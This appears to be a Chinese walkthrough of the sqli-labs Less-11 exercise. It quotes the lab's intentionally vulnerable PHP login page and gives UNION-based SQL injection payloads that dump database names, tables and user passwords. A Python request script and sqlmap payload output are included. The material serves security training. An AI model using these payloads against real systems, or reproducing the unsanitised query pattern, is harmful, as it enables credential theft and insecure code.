sqli-lab-less11
一、靶标地址
Less-11 POST-Error Based-Single quotes-String
#字符型基于报错的SQL注入
http://127.0.0.1/sqli/less-11/
二、漏洞探测
http://127.0.0.1/sqli/less-11/
使用burpsuite抓包或者
F12---Network---Request找到post的数据包
输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#Your Login name:admin
#Your Password:admin
猜测业务逻辑流程应该是根据输入的用户名password去查询然后进行比对
uname=1'&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1
猜测语句为 '1'' and password='' LIMIT 0,1
推测语句为select username,password from users where username='$uname' and password='$passwd' limit 0,1;
三、源码分析
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-11- Error Based- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
#表单提交
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :
<input type="text" name="uname" value=""/>
</div>
<div> Password :
<input type="text" name="passwd" value=""/>
</div></br>
<div style=" margin-top:9px;margin-left:90px;">
<input type="submit" name="submit" value="Submit" />
</div>
</form>
</div></div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
#isset() 函数用于检测变量是否已设置并且非 NULL。
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)#查询得到数据回显
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else #查询未得到数据无回显 语法错误回显语法报错
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
</font>
</div>
</body>
</html>
四、黑盒与白盒测试
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
#查询用户和数据库
uname=1' union select user(),database() #&passwd=1&submit=Submit
#报错 这里不能使用--+ 而使用#不会报错
uname=1' union select user(),database() --+&passwd=1&submit=Submit
#uname=1不会有任何回显,所以后面的两个值可以被回显出来
select username,password from users where username='1' union select user(),database() #' and password='1' limit 0,1;
#查询表名
uname=1' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),database() #&passwd=1&submit=Submit
#查询字段名
uname=1' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),database() #&passwd=1&submit=Submit
#查询字段值
uname=1' union select (select group_concat(username) from users),database() #&passwd=1&submit=Submit
uname=1' union select (select group_concat(password) from users),database() #&passwd=1&submit=Submit
五、脚本撰写
import requests
url="http://192.168.128.159/sqli/less-11/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
"uname" : "1' union select user(),database() #",
"passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-11/" --data "uname=1&passwd=1&submit=Submit" --batch
Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1' OR NOT 5787=5787#&passwd=11&submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1' AND (SELECT 9458 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(9458=9458,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QGhc&passwd=11&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1' AND (SELECT 1698 FROM (SELECT(SLEEP(5)))Gmgb)-- VBGO&passwd=11&submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1' UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x795a5a53624c51795a4771767578594b474b72694e59424143654570547a7a4e6774636563467142,0x716a706b71)#&passwd=11&submit=Submit
七、总结
1、通过表单提交数据
2、sqlmap新用法